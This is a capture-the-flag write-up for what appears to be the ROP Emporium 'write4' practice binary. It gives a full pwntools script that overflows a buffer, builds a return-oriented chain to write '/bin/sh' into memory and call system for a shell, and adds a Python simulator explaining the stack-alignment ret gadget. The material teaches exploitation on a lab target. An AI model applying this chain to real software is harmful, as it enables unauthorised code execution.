The main point of this challenge is to write data into memory and then pass that memory address in rdi.
Environment: Ubuntu 18.04, pwntools (py3)
EXP
```python
from pwn import *

elf = context.binary = ELF('write4')
io = process(elf.path)

data_seg = p64(0x601000)      # writable address that will hold "/bin/sh"
systemad = p64(0x4005e0)      # system
pop_r14_r15 = p64(0x400890)   # pop r14; pop r15; ret
shstr = b"/bin/sh\x00"        # string to write, NUL-terminated, exactly 8 bytes
movstr = p64(0x400820)        # write gadget: stores r15 at [r14], then ret
retad = p64(0x400806)         # ret (stack alignment before system)
poprdi = p64(0x400893)        # pop rdi; ret

payload = b'A' * 40           # padding up to the saved return address
payload += pop_r14_r15        # r14 = data_seg, r15 = "/bin/sh\0"
payload += data_seg
payload += shstr
payload += movstr             # [data_seg] = "/bin/sh\0"
payload += poprdi             # rdi = data_seg
payload += data_seg
payload += retad              # extra ret keeps rsp 16-byte aligned at system entry
payload += systemad           # system("/bin/sh")

io.sendline(payload)
io.interactive()
```
As usual, call a ret gadget once before system to align the stack =-=
That's all.
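To see why that extra ret is needed, here is a small added walk-through of the chain above (not part of the original writeup): it steps through the slots with the gadget behaviour implied by the variable names (pop_r14_r15, movstr, poprdi, retad), records what lands in rdi and memory, and tracks rsp modulo 16, assuming the SysV x86-64 rule that rsp ≡ 8 (mod 16) when a function executes ret.

```python
import struct

# Addresses from the writeup above; gadget semantics are assumed from its variable names.
GADGETS = {
    0x400890: ["pop r14", "pop r15", "ret"],   # pop_r14_r15
    0x400820: ["mov [r14], r15", "ret"],       # movstr (the write gadget)
    0x400893: ["pop rdi", "ret"],              # poprdi
    0x400806: ["ret"],                         # retad
}
SYSTEM = 0x4005e0
DATA_SEG = 0x601000


def build_chain(align=True):
    """The writeup's chain after the 40 filler bytes, as a list of 8-byte slots.
    align=False drops the lone ret gadget to show what happens without it."""
    slots = [0x400890, DATA_SEG, b"/bin/sh\x00", 0x400820, 0x400893, DATA_SEG]
    if align:
        slots.append(0x400806)
    slots.append(SYSTEM)
    return [s if isinstance(s, bytes) else struct.pack("<Q", s) for s in slots]


def simulate(slots):
    """Consume the chain slot by slot and return the state at system() entry."""
    regs, mem, i = {}, {}, 0
    while True:
        rip = struct.unpack("<Q", slots[i])[0]   # 'ret' pops the next slot into rip
        i += 1
        if rip == SYSTEM:
            break
        for insn in GADGETS[rip]:
            if insn.startswith("pop "):
                regs[insn[4:]] = slots[i]        # pop takes the next slot off the stack
                i += 1
            elif insn == "mov [r14], r15":
                mem[struct.unpack("<Q", regs["r14"])[0]] = regs["r15"]
            # the trailing 'ret' of each gadget is handled by the loop head
    rdi = struct.unpack("<Q", regs["rdi"])[0]
    # rsp points at slot 0 with rsp ≡ 8 (mod 16); every consumed slot adds 8.
    return {"rdi": rdi, "arg": mem.get(rdi), "rsp_mod16": (8 + 8 * i) % 16}
```

With the ret gadget, rsp_mod16 is 8 at system entry (what the ABI expects at a function's first instruction); without it the value is 0, which is why movaps-style instructions inside system can fault.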